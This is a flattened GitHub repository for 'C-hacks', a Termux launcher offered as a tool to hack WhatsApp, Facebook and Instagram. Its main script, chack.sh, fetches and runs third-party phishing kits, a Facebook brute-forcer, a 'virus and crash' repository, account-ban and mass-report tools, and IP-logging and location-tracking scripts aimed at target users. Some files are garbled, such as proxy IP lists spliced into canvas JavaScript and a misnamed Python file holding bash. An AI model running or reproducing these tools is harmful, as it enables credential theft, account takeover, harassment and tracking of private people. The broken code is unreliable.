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But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # C-hacks 2 | Hi am nidhin 3 | # 4 | Its a social Media gathering Tool And its have whatsapp hacks , 5 | Fb hacks , instagram hacks , And information gathering 6 | . The main script is that I has added ip location tracking file 7 | created by MASTER-HACK And its has ip phishing extra 8 | On whatsapp hacks I has added moded whatsapp whatsapp virus extra 9 | That's it . Happy learning And don't forget to 10 | Bash my Chack.sh file . enjoy the Tool bro .. 11 | # 12 | 13 | alternatetext 14 | 15 | # 16 | Its only for education purposes 17 | # 18 | Updates coming soon 19 | # Installation 20 | # 21 | ` apt update -y && apt upgrade -y ` 22 | 23 | ` apt install git -y ` 24 | 25 | ` git clone https://github.com/DRACULA-HACK/C-hacks ` 26 | 27 | ` cd C-hacks ` 28 | 29 | ` chmod +x chack.sh ` 30 | 31 | ` ./chack.sh ` 32 | # 33 | created by 34 | MASTER-HACK 35 | # 36 | ™𝚰𝚴𝛁𝚫𝐃𝚺𝐑𝐒 𝚯𝐅𝐂 🪁 37 | # 38 | https://wa.me//+918660264556 39 | 40 | # 41 | 42 | alternatetext 43 | 44 | # 45 | -------------------------------------------------------------------------------- /chack.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo -e " tool is for termux users " 3 | sleep 2 4 | 5 | echo " if you have any issues or errors contact me " 6 | sleep 5 7 | 8 | 9 | 10 | xdg-open https://wa.me//+918660264556 11 | clear 12 | pkg install pv -y 13 | pkg install figlet -y 14 | termux-setup-storage -y 15 | pkg install ruby -y 16 | gem install lolcat 17 | clear 18 | 19 | sleep 5 20 | figlet HI BRO |pv -qL 50 | lolcat 21 | echo -e " \033[1;31m By " 22 | figlet MASTER-HACK |pv -qL 50 | lolcat 23 | sleep 8 24 | clear 25 | figlet INVADERS ofc | pv -qL 50 | lolcat 26 | sleep 8 27 | clear 28 | red='\033[1;31m' 29 | rset='\033[0m' 30 | grn='\033[1;32m' 31 | ylo='\033[1;33m' 32 | blue='\033[1;34m' 33 | cyan='\033[1;36m' 34 | pink='\033[1;35m' 35 | figlet C-HACKS | pv -qL 39 | lolcat 36 | echo -e " \033[1;34mcreated by \033[1;31mMASTER\033[1;35m-\033[1;33mHACK 37 | " 38 | echo -e " 39 | $rset \033[1;31m select \033[1;36m(type the number) 40 | 41 | $rest \033[1;32m(1) whatsapp-hack 42 | 43 | \033[1;34m(2) fb hack 44 | 45 | \033[1;35m(3) insta hack 46 | 47 | \033[1;36m(4) information gathering 48 | 49 | \033[1;32m(5) paid packages 50 | 51 | 52 | " 53 | 54 | read -p " Enter Your Choice :- " choice 55 | 56 | if [ $choice = 1 ];then 57 | { 58 | clear 59 | figlet wa-hack |pv -qL 30 | lolcat 60 | 61 | echo -e " 62 | 63 | \033[1;34m (1) \033[1;32m wha bot 64 | 65 | \033[1;34m (2) \033[1;33m wha phishing 66 | 67 | \033[1;34m (3) \033[1;36mmoded wha 68 | 69 | \033[1;34m (4) \033[1;31mvirus and crash txt \033[1;34m 70 | 71 | \033[1;34m (5) \033[1;32mwhatsapp ban methods 72 | 73 | " |pv -qL 50 74 | 75 | 76 | read -p " enter your option :-" whachoice 77 | 78 | if [ $whachoice = 1 ];then 79 | sleep 4 80 | termux-open-url https://github.com/DRACULA-HACK/whatsapp-bot-md 81 | 82 | elif [ $whachoice = 2 ];then 83 | cd $home 84 | git clone https://github.com/Ignitetch/AdvPhishing 85 | cd AdvPhishing/ 86 | chmod 777 * 87 | ./Android-Setup.sh 88 | ./AdvPhishing.sh 89 | 90 | elif [ $whachoice = 3 ];then 91 | termux-open-url https://www.youtube.com/c/TROKSMODS 92 | elif [ $whachoice = 4 ];then 93 | apt update 94 | 95 | apt upgrade -y 96 | 97 | termux-setup-storage -y 98 | cd $home 99 | git clone https://github.com/DRACULA-HACK/Master-virus 100 | 101 | cd Master-virus 102 | 103 | chmod +x * 104 | 105 | ./virus.sh 106 | 107 | elif [ $whachoice = 5 ];then 108 | echo " PLEASE WAIT INSTALLING THE PROGRAM FROM SERVER " | lolcat 109 | apt install pv -y >/dev/null 2>&1 110 | 111 | apt install figlet -y >/dev/null 2>&1 112 | 113 | termux-setup-storage -y >/dev/null 2>&1 114 | 115 | 116 | apt install ruby -y >/dev/null 2>&1 117 | 118 | 119 | gem install lolcat >/dev/null 2>&1 120 | echo " Den INSTALLED THE REQUIREMENT PACKAGES. LET THE PROGRAM INSTALL "| pv -qL 100 |lolcat 121 | 122 | 123 | git clone https://github.com/DRACULA-HACK/ids-inf >/dev/null 2>&1 124 | 125 | cd ids-inf >/dev/null 2>&1 126 | echo " installed " | pv -qL 100 |lolcat 127 | 128 | echo " changing directory "| pv -qL 100 |lolcat 129 | echo -e " 130 | 131 | \033[1;32m den " 132 | echo -e " 133 | 134 | 135 | INSTALLING THE PYTHON REQUIREMENTS 136 | for 137 | THE INFORMATION GATHERING Programme 138 | 139 | please wait it took time 140 | 141 | "| pv -qL 100 |lolcat 142 | 143 | 144 | 145 | python3 -m pip install -r requirements.txt >/dev/null 2>&1 146 | echo -e " 147 | 148 | ALL DEN INSTALLED ALL THE packages 149 | 150 | 😅 okay naw going to bash the start file 151 | 152 | "| pv -qL 100 |lolcat 153 | 154 | echo -e " Bourne Again SHell the file start-ids.sh 155 | 156 | "| pv -qL 100 |lolcat 157 | 158 | bash start-ids.sh 159 | 160 | 161 | 162 | fi 163 | 164 | } 165 | elif [ $choice = 2 ];then 166 | { 167 | clear 168 | figlet fb-hack | pv -qL 50 | lolcat 169 | 170 | echo " by Master-hack " | lolcat 171 | 172 | echo -e " \033[1;36m 173 | 174 | (1) fb phishing 175 | 176 | (2) fb bruteforce 177 | 178 | (3) fb inf gathering 179 | 180 | (4) fb report 181 | 182 | " | pv -qL 40 | lolcat 183 | 184 | read -p " Enter Your Choice :- " fbtool 185 | 186 | if [ $fbtool = 1 ];then 187 | cd $home 188 | git clone https://github.com/htr-tech/zphisher.git 189 | 190 | cd zphisher 191 | bash zphisher.sh 192 | elif [ $fbtool = 2 ];then 193 | cd $home 194 | git clone https://github.com/IAmBlackHacker/Facebook-BruteForce 195 | cd Facebook-BruteForce 196 | python3 -m pip install requests bs4 197 | python3 -m pip install mechanize 198 | python3 fb.py or python fb2.py 199 | 200 | elif [ $fbtool = 3 ];then 201 | apt update -y && apt upgrade -y 202 | apt install git -y 203 | apt install python2 -y 204 | git clone https://github.com/xHak9x/fbi.git 205 | cd fbi 206 | pip2 install -r requirements.txt 207 | python2 fbi.py 208 | 209 | elif [ $fbtool = 4 ];then 210 | 211 | 212 | apt install python2 -y 213 | 214 | apt install git -y 215 | cd $home 216 | git clone https://github.com/bhikandeshmukh/fbreport.git 217 | 218 | cd fbreport 219 | 220 | ls 221 | 222 | unzip Report.zip 223 | 224 | python2 Report.py 225 | 226 | 227 | fi 228 | } 229 | 230 | 231 | elif [ $choice = 3 ];then 232 | clear 233 | echo -e " 234 | 235 | \033[1;35m 236 | hi running the insta hack 237 | " 238 | sleep 3 239 | 240 | 241 | echo -e " \033[1;33m INSTALLATION " |pv -qL 40 242 | echo -e 243 | 244 | 245 | figlet INSTA-FOLLOW-BOTZ |pv -qL 50 | lolcat 246 | apt install figlet -y 247 | 248 | apt install toilet -y 249 | 250 | apt install cowsay -y 251 | 252 | apt install nano -y 253 | 254 | apt install ruby -y 255 | 256 | gem install lolcat 257 | 258 | apt install git curl openssh openssl openssl-tool -y 259 | 260 | git clone https://github.com/DRACULA-HACK/insta-follow-botz.git 261 | 262 | cd insta-follow-botz 263 | 264 | chmod +x insta4.sh 265 | 266 | ./insta4.sh 267 | 268 | 269 | elif [ $choice = 4 ];then 270 | { 271 | clear 272 | figlet INF gathering |pv -qL 50 | lolcat 273 | 274 | echo -e " 275 | 276 | 277 | 278 | (1) ip logger (url filter ) 279 | 280 | (2) phone number information gathering (basic) 281 | 282 | (3) fb & insta ( information gathering ) 283 | 284 | (4) ip tracker (by master-hack ) 285 | 286 | (5) nmap 287 | 288 | " |pv -qL 40 | lolcat 289 | 290 | read -p " Your Choice :- " inf 291 | 292 | if [ $inf = 1 ];then 293 | 294 | termux-open-url https://iplogger.org/ 295 | 296 | elif [ $inf = 2 ];then 297 | cd $home 298 | clear && echo -e '\033[1;32m[*] Download starting... MASTER-HACK' && apt update > /dev/null 2>&1 && apt --assume-yes install wget > /dev/null 2>&1 && wget https://raw.githubusercontent.com/ExpertAnonymous/PhoneInfoga/master/phoneinfoga.sh -q && clear && bash phoneinfoga.sh 299 | cd PhoneInfoga 300 | ls 301 | clear 302 | python2 -m pip install -r requirements.txt 303 | clear 304 | echo -e " Enter the target phone number 305 | 306 | 307 | " | pv -qL 40 | lolcat 308 | echo -e " \033[1;34m Type the country code with + 309 | 310 | " | pv -qL 40 311 | read -p " => " code 312 | 313 | echo -e " \033[1;36m number with out country code " | pv -qL 30 314 | 315 | read -p " numb => " number 316 | ./phoneinfoga.py -n $code$number 317 | 318 | elif [ $inf = 3 ];then 319 | 320 | { 321 | echo -e " 322 | 323 | 324 | (1) facebook information 325 | 326 | (2) instagram information 327 | 328 | " |pv -qL 30 | lolcat 329 | 330 | read -p " your option => " social 331 | 332 | if [ $social = 2 ];then 333 | 334 | figlet INSTA-FOLLOW-BOTZ |pv -qL 50 | lolcat 335 | apt install figlet -y 336 | 337 | apt install toilet -y 338 | 339 | ip install cowsay -y 340 | 341 | apt install nano -y 342 | 343 | apt install ruby -y 344 | 345 | gem install lolcat 346 | 347 | apt install git curl openssh openssl openssl-tool -y 348 | 349 | git clone https://github.com/DRACULA-HACK/insta-follow-botz.git 350 | 351 | cd insta-follow-botz 352 | 353 | chmod +x insta4.sh 354 | 355 | ./insta4.sh 356 | 357 | elif [ $social = 1 ];then 358 | 359 | apt install python2 -y 360 | git clone https://github.com/xHak9x/fbi.git 361 | cd fbi 362 | pip2 install -r requirements.txt 363 | python2 fbi.py 364 | fi 365 | } 366 | 367 | elif [ $inf = 4 ];then 368 | 369 | cd ip/file/Script/ 370 | 371 | chmod +x Ip.py 372 | ./Ip.py 373 | 374 | elif [ $inf = 5 ];then 375 | pkg install nmap -y 376 | clear 377 | echo -e " 378 | 379 | " 380 | clear 381 | nmap -h 382 | 383 | echo -e " 384 | 385 | " 386 | 387 | echo -e " \033[1;34m type \033[1;31mnmap - options \033[1;34mfor to run the nmap " 388 | 389 | fi 390 | } 391 | elif [ $choice = 5 ];then 392 | 393 | unzip p.zip 394 | 395 | cd p 396 | 397 | 398 | bash .paidone.sh 399 | 400 | else 401 | echo "wrong option " 402 | bash Chack.sh 403 | 404 | 405 | 406 | fi 407 | -------------------------------------------------------------------------------- /ip/Iplogger.py: -------------------------------------------------------------------------------- 1 | # ntha mowna edu uru chugam 2 | 3 | termux-open-url https://iplogger.org 4 | 5 | printf ("hi") 6 | 7 | 8 | -------------------------------------------------------------------------------- /ip/file/Fbcodes.chacks.tryeme.ruby.zip: -------------------------------------------------------------------------------- 1 | Input 2 | 04379675 3 | 15668258 4 | 28092295 5 | 37823812 6 | 57920333 7 | 64240888 8 | 64584856 9 | 79919507 10 | 90721678 11 | 91623325 12 | /input! 13 | Hehe 14 | Codes for me 15 | Hacksc 16 | -------------------------------------------------------------------------------- /ip/file/P.txt.zip.zip.html: -------------------------------------------------------------------------------- 1 | 2 | var canvas = document.getElementById("myCanvas"); 3 | 4 | var ctx = canvas.getContext("2d"); 5 | 6 | ctx.font = "16px Arial"; 7 | 8 | canvas.addEventListener("mousemove", function(e) { 9 | var cRect = canvas.getBoundingClientRect(); // Gets CSS pos, and width/height 10 | var canvasX = Math.round(e.clientX - cRect.left); // Subtract the 'left' of the canvas 11 | var canvasY = Math.round(e.clientY - cRect.top); // from the X/Y positions to make 12 | ctx.clearRect(0, 0, canvas.width, canvas.height); // (0,0) the top left of the canvas 13 | ctx.fillText("X: "+canvasX+", Y: "+canvasY, 10, 20);43.153.13.7:59394 14 | 15 | 188.0.147.102:3128 16 | 17 | 185.150.130.103:808 18 | 19 | 47.91.107.251:3080 20 | 21 | 49.0.2.242:8090 22 | 23 | 192.53.163.144:3128 24 | 25 | 20.228.221.183:8000 26 | 27 | 5.189.184.6:80 28 | 29 | 198.49.68.80:80 30 | 31 | 164.92.75.10:80 32 | 33 | 139.99.237.62:80 34 | 35 | 8.219.97.248:80 36 | 37 | 20.111.54.16:80 38 | 39 | 45.42.177.50:3128 40 | 41 | 81.200.123.74:80 42 | 43 | 20.206.106.192:8123 44 | 45 | 83.229.72.174:80 46 | 47 | 45.42.177.49:3128 48 | 49 | 172.104.115.95:80 50 | 51 | 165.154.226.12:80 52 | 53 | 185.76.10.68:8081 54 | 55 | 47.57.7.183:80 56 | 57 | 51.159.4.98:80 58 | 59 | 35.178.238.246:80 60 | 61 | 193.122.71.184:3128 62 | 63 | 8.209.246.6:80 64 | 65 | 124.156.9.165:59394 66 | 67 | 103.149.162.195:80 68 | 69 | 172.104.206.170:80 70 | 71 | 89.107.197.165:3128 72 | 73 | 58.27.59.249:80 74 | 75 | 118.238.12.55:80 76 | 77 | 165.154.225.65:80 78 | 79 | 135.125.106.131:3128 80 | 81 | 219.78.228.211:80 82 | 83 | 45.153.185.174:80 84 | 85 | 185.76.10.144:8080 86 | 87 | 47.74.152.29:8888 88 | 89 | 165.154.235.156:80 90 | 91 | 88.210.37.28:80 92 | 93 | 169.57.1.85:8123 94 | 95 | 49.207.36.81:80 96 | 97 | 47.254.153.200:80 98 | 99 | 20.24.181.133:80 100 | 101 | 165.154.235.188:80 102 | 103 | 20.87.10.146:8000 104 | 105 | 185.61.152.137:8080 106 | 107 | 103.212.99.235:80 108 | 109 | 159.89.132.167:8989 110 | 111 | 212.46.230.102:6969 112 | 113 | 162.0.226.218:80 114 | 115 | 40.122.233.211:8000 116 | 117 | 216.137.184.253:80 118 | 119 | 103.160.202.217:8080 120 | 121 | 185.98.138.177:80 122 | 123 | 45.79.27.210:44554 124 | 125 | 90.112.170.228:80 126 | 127 | 165.154.243.154:80 128 | 129 | 165.154.243.209:80 130 | 131 | 173.244.48.9:3128 132 | 133 | 43.153.53.51:59394 134 | 135 | 87.250.63.172:8118 136 | 137 | 46.246.6.8:3128 138 | 139 | 45.167.126.249:9992 140 | 141 | 117.54.114.102:80 142 | 143 | 165.154.235.76:80 144 | 145 | 8.210.149.174:80 146 | 147 | 221.132.28.18:8090 148 | 149 | 165.154.226.242:80 150 | 151 | 200.103.102.18:80 152 | 153 | 20.110.214.83:80 154 | 155 | 78.154.180.52:81 156 | 157 | 47.241.245.186:80 158 | 159 | 47.74.66.7:30001 160 | 161 | 20.254.52.236:8000 162 | 163 | 20.163.162.55:8000 164 | 165 | 165.154.243.53:80 166 | 167 | 80.48.119.28:8080 168 | 169 | 47.254.247.192:4153 170 | 171 | 104.45.128.122:80 172 | 173 | 157.100.26.69:80 174 | 175 | 196.179.204.9:8080 176 | 177 | 51.15.242.202:8888 178 | 179 | 121.1.41.162:111 180 | 181 | 161.35.214.127:43231 182 | 183 | 45.42.177.17:3128 184 | 185 | 100.42.78.66:59394 186 | 187 | 157.230.48.102:80 188 | 189 | 221.132.18.26:8090 190 | 191 | 172.105.184.208:8001 192 | 193 | 203.235.116.97:8080 194 | 195 | 47.88.6.186:30001 196 | 197 | 200.105.215.18:33630 198 | 199 | 209.146.19.58:55443 200 | 201 | 45.42.177.34:3128 202 | 203 | 47.243.138.208:6677 204 | 205 | 8.211.22.130:5678 206 | 207 | 198.59.191.234:8080 208 | 209 | 20.188.47.85:8000 210 | 211 | 153.126.179.216:8080 212 | -------------------------------------------------------------------------------- /ip/file/Script/Ip.py: -------------------------------------------------------------------------------- 1 | red='\033[1;31m' 2 | 3 | rset='\033[0m' 4 | 5 | grn='\033[1;32m' 6 | 7 | ylo='\033[1;33m' 8 | 9 | blue='\033[1;34m' 10 | 11 | cyan='\033[1;36m' 12 | 13 | pink='\033[1;35m' 14 | 15 | banner() { 16 | 17 | clear 18 | 19 | figlet MASTER-IP |pv -qL 100 |lolcat 20 | 21 | } 22 | 23 | menu() { 24 | 25 | echo -e $blue " 26 | 27 | 28 | 29 | 30 | 31 | (1) Your ip address 32 | 33 | 34 | 35 | (2) Ip information gathering 36 | 37 | 38 | 39 | (3) ip logger (GPS phishing) 40 | 41 | 42 | (4) ip phishing (localhost url) 43 | 44 | 45 | (0) exit 46 | 47 | " 48 | 49 | read -p "choose your option => " ip 50 | 51 | if [ $ip = 1 ]; then 52 | 53 | myipaddr 54 | 55 | elif [ $ip = 2 ]; then 56 | 57 | useripaddr 58 | 59 | elif [ $ip = 3 ]; then 60 | 61 | iplogger 62 | elif [ $ip = 4 ]; then 63 | 64 | ip_phishing 65 | 66 | elif [ $ip = 0 ]; then 67 | 68 | sleep 1 69 | 70 | echo -e " ok bye thanks for using thus script " 71 | 72 | exit 1 73 | 74 | else 75 | 76 | echo -e $red "wrong option bro ! " 77 | 78 | sleep 3 79 | 80 | banner 81 | 82 | menu 83 | 84 | fi 85 | 86 | } 87 | 88 | myipaddr() { 89 | 90 | myipaddripapico=$(curl -s "https://ipapi.co//json" -L) 91 | 92 | myipaddripapicom=$(curl -s "http://ip-api.com/json/" -L) 93 | 94 | theip=$(echo $myipaddripapico | grep -Po '(?<="ip":)[^,]*' | tr -d '[]"') 95 | 96 | thecity=$(echo $myipaddripapico | grep -Po '(?<="city":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 97 | 98 | theregion=$(echo $myipaddripapico | grep -Po '(?<="region":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 99 | 100 | thecountry=$(echo $myipaddripapico | grep -Po '(?<="country_name":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 101 | 102 | thelat=$(echo $myipaddripapicom | grep -Po '(?<="lat":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 103 | 104 | thelon=$(echo $myipaddripapicom | grep -Po '(?<="lon":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 105 | 106 | thetime=$(echo $myipaddripapicom | grep -Po '(?<="timezone":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 107 | 108 | thepostal=$(echo $myipaddripapicom | grep -Po '(?<="zip":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 109 | 110 | theisp=$(echo $myipaddripapico | grep -Po '(?<="org":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 111 | 112 | theasn=$(echo $myipaddripapico | grep -Po '(?<="asn":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 113 | 114 | thecountrycode=$(echo $myipaddripapico | grep -Po '(?<="country_code":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 115 | 116 | thecurrency=$(echo $myipaddripapico | grep -Po '(?<="currency":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 117 | 118 | thelanguage=$(echo $myipaddripapico | grep -Po '(?<="languages":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 119 | 120 | thecalling=$(echo $myipaddripapico | grep -Po '(?<="country_calling_code":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 121 | 122 | banner 123 | 124 | printf "\e[0m\n" 125 | 126 | printf "\e[0m\n" 127 | 128 | printf " \e[0m\e[1;93m Ip Address \e[0m\e[1;96m:\e[0m\e[1;92m $theip\e[0m\n" 129 | 130 | printf " \e[0m\e[1;93m City \e[0m\e[1;96m:\e[0m\e[1;92m $thecity\e[0m\n" 131 | 132 | printf " \e[0m\e[1;93m Region \e[0m\e[1;96m:\e[0m\e[1;92m $theregion\e[0m\n" 133 | 134 | printf " \e[0m\e[1;93m Country \e[0m\e[1;96m:\e[0m\e[1;92m $thecountry\e[0m\n" 135 | 136 | printf "\e[0m\n" 137 | 138 | printf " \e[0m\e[1;93m Latitude \e[0m\e[1;96m:\e[0m\e[1;92m $thelat\e[0m\n" 139 | 140 | printf " \e[0m\e[1;93m Longitude \e[0m\e[1;96m:\e[0m\e[1;92m $thelon\e[0m\n" 141 | 142 | printf " \e[0m\e[1;93m Time Zone \e[0m\e[1;96m:\e[0m\e[1;92m $thetime\e[0m\n" 143 | 144 | printf " \e[0m\e[1;93m Postal Code \e[0m\e[1;96m:\e[0m\e[1;92m $thepostal\e[0m\n" 145 | 146 | printf "\e[0m\n" 147 | 148 | printf " \e[0m\e[1;93m ISP \e[0m\e[1;96m:\e[0m\e[1;92m $theisp\e[0m\n" 149 | 150 | printf " \e[0m\e[1;93m ASN \e[0m\e[1;96m:\e[0m\e[1;92m $theasn\e[0m\n" 151 | 152 | printf "\e[0m\n" 153 | 154 | printf " \e[0m\e[1;93m Country Code \e[0m\e[1;96m:\e[0m\e[1;92m $thecountrycode\e[0m\n" 155 | 156 | printf " \e[0m\e[1;93m Currency \e[0m\e[1;96m:\e[0m\e[1;92m $thecurrency\e[0m\n" 157 | 158 | printf " \e[0m\e[1;93m Languages \e[0m\e[1;96m:\e[0m\e[1;92m $thelanguage\e[0m\n" 159 | 160 | printf " \e[0m\e[1;93m Calling Code \e[0m\e[1;96m:\e[0m\e[1;92m $thecalling\e[0m\n" 161 | 162 | printf "\e[0m\n" 163 | 164 | printf " \e[0m\e[1;93m location in google map \e[0m\e[1;96m:\e[0m\e[1;94m https://maps.google.com/?q=$mylat,$thelon\e[0m\n" 165 | 166 | sleep 5 167 | 168 | printf "\e[0m\n" 169 | 170 | printf " \e[0m\e[1;91m[\e[0m\e[1;97m01\e[0m\e[1;91m]\e[0m\e[1;93m Return To Main Menu\e[0m\n" 171 | 172 | printf " \e[0m\e[1;91m[\e[0m\e[1;97m02\e[0m\e[1;91m]\e[0m\e[1;93m Exit\e[0m\n" 173 | 174 | printf "\e[0m\n" 175 | 176 | read -p $' \e[1;31m>>\e[0m\e[1;96m \en' mainorexit1 177 | 178 | if [[ $mainorexit1 == 1 || $mainorexit1 == 01 ]]; then 179 | 180 | banner 181 | 182 | menu 183 | 184 | elif [[ $mainorexit1 == 2 || $mainorexit1 == 02 ]]; then 185 | 186 | printf "\e[0m\n" 187 | 188 | printf "\e[0m\n" 189 | 190 | exit 1 191 | 192 | else 193 | 194 | printf " \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\e[1;93m Invalid option \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\n" 195 | 196 | sleep 1 197 | 198 | banner 199 | 200 | menu 201 | 202 | fi 203 | 204 | } 205 | 206 | useripaddr() { 207 | 208 | banner 209 | 210 | printf "\e[0m\n" 211 | 212 | printf "\e[0m\n" 213 | 214 | printf "\e[0m\n" 215 | 216 | read -p $' \e[1;31m[\e[0m\e[1;37m~\e[0m\e[1;31m]\e[0m\e[1;92m Input IP Address \e[0m\e[1;96m: \e[0m\e[1;93m\en' useripaddress 217 | 218 | ipaddripapico=$(curl -s "https://ipapi.co/$useripaddress/json" -L) 219 | 220 | ipaddripapicom=$(curl -s "http://ip-api.com/json/$useripaddress" -L) 221 | 222 | userip=$(echo $ipaddripapico | grep -Po '(?<="ip":)[^,]*' | tr -d '[]"') 223 | 224 | usercity=$(echo $ipaddripapico | grep -Po '(?<="city":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 225 | 226 | useregion=$(echo $ipaddripapico | grep -Po '(?<="region":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 227 | 228 | usercountry=$(echo $ipaddripapico | grep -Po '(?<="country_name":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 229 | 230 | userlat=$(echo $ipaddripapicom | grep -Po '(?<="lat":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 231 | 232 | userlon=$(echo $ipaddripapicom | grep -Po '(?<="lon":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 233 | 234 | usertime=$(echo $ipaddripapicom | grep -Po '(?<="timezone":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 235 | 236 | userpostal=$(echo $ipaddripapicom | grep -Po '(?<="zip":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 237 | 238 | userisp=$(echo $ipaddripapico | grep -Po '(?<="org":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 239 | 240 | userasn=$(echo $ipaddripapico | grep -Po '(?<="asn":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 241 | 242 | usercountrycode=$(echo $ipaddripapico | grep -Po '(?<="country_code":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 243 | 244 | usercurrency=$(echo $ipaddripapico | grep -Po '(?<="currency":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 245 | 246 | userlanguage=$(echo $ipaddripapico | grep -Po '(?<="languages":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 247 | 248 | usercalling=$(echo $ipaddripapico | grep -Po '(?<="country_calling_code":)[^},]*' | tr -d '[]"' | sed 's/\(<[^>]*>\|<\/>\|{1|}\)//g') 249 | 250 | banner 251 | 252 | printf "\e[0m\n" 253 | 254 | printf "\e[0m\n" 255 | 256 | printf " \e[0m\e[1;93m Ip Address \e[0m\e[1;96m:\e[0m\e[1;92m $userip\e[0m\n" 257 | 258 | printf " \e[0m\e[1;93m City \e[0m\e[1;96m:\e[0m\e[1;92m $usercity\e[0m\n" 259 | 260 | printf " \e[0m\e[1;93m Region \e[0m\e[1;96m:\e[0m\e[1;92m $useregion\e[0m\n" 261 | 262 | printf " \e[0m\e[1;93m Country \e[0m\e[1;96m:\e[0m\e[1;92m $usercountry\e[0m\n" 263 | 264 | printf "\e[0m\n" 265 | 266 | printf " \e[0m\e[1;93m Latitude \e[0m\e[1;96m:\e[0m\e[1;92m $userlat\e[0m\n" 267 | 268 | printf " \e[0m\e[1;93m Longitude \e[0m\e[1;96m:\e[0m\e[1;92m $userlon\e[0m\n" 269 | 270 | printf " \e[0m\e[1;93m Time Zone \e[0m\e[1;96m:\e[0m\e[1;92m $usertime\e[0m\n" 271 | 272 | printf " \e[0m\e[1;93m Postal Code \e[0m\e[1;96m:\e[0m\e[1;92m $userpostal\e[0m\n" 273 | 274 | printf "\e[0m\n" 275 | 276 | printf " \e[0m\e[1;93m ISP \e[0m\e[1;96m:\e[0m\e[1;92m $userisp\e[0m\n" 277 | 278 | printf " \e[0m\e[1;93m ASN \e[0m\e[1;96m:\e[0m\e[1;92m $userasn\e[0m\n" 279 | 280 | printf "\e[0m\n" 281 | 282 | printf " \e[0m\e[1;93m Country Code \e[0m\e[1;96m:\e[0m\e[1;92m $usercountrycode\e[0m\n" 283 | 284 | printf " \e[0m\e[1;93m Currency \e[0m\e[1;96m:\e[0m\e[1;92m $usercurrency\e[0m\n" 285 | 286 | printf " \e[0m\e[1;93m Languages \e[0m\e[1;96m:\e[0m\e[1;92m $userlanguage\e[0m\n" 287 | 288 | printf " \e[0m\e[1;93m Calling Code \e[0m\e[1;96m:\e[0m\e[1;92m $usercalling\e[0m\n" 289 | 290 | printf "\e[0m\n" 291 | 292 | printf " \e[0m\e[1;93m GOOGLE Maps \e[0m\e[1;96m:\e[0m\e[1;94m https://maps.google.com/?q=$userlat,$userlon\e[0m\n" 293 | 294 | sleep 5 295 | 296 | printf "\e[0m\n" 297 | 298 | printf " \e[0m\e[1;91m[\e[0m\e[1;97m01\e[0m\e[1;91m]\e[0m\e[1;93m Return To Main Menu\e[0m\n" 299 | 300 | printf " \e[0m\e[1;91m[\e[0m\e[1;97m02\e[0m\e[1;91m]\e[0m\e[1;93m Exit\e[0m\n" 301 | 302 | printf "\e[0m\n" 303 | 304 | read -p $' \e[1;31m>>\e[0m\e[1;96m \en' mainorexit2 305 | 306 | if [[ $mainorexit2 == 1 || $mainorexit2 == 01 ]]; then 307 | 308 | banner 309 | 310 | menu 311 | 312 | elif [[ $mainorexit2 == 2 || $mainorexit2 == 02 ]]; then 313 | 314 | printf "\e[0m\n" 315 | 316 | printf "\e[0m\n" 317 | 318 | exit 1 319 | 320 | else 321 | 322 | printf " \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\e[1;93m Invalid option \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\n" 323 | 324 | sleep 1 325 | 326 | banner 327 | 328 | menu 329 | 330 | fi 331 | 332 | } 333 | 334 | iplogger() { 335 | 336 | 337 | 338 | termux-open-url https://iplogger.org/ 339 | 340 | mainorexit1 341 | 342 | if [[ $mainorexit1 == 1 || $mainorexit1 == 01 ]]; then 343 | 344 | banner 345 | 346 | menu 347 | 348 | elif [[ $mainorexit1 == 2 || $mainorexit1 == 02 ]]; then 349 | 350 | printf "\e[0m\n" 351 | 352 | printf "\e[0m\n" 353 | 354 | exit 1 355 | 356 | else 357 | 358 | printf " \e[1;91m[\e[0m\e[1;97m!\e[0m\e[1;91m]\e[0m\e[1;93m Invalid option 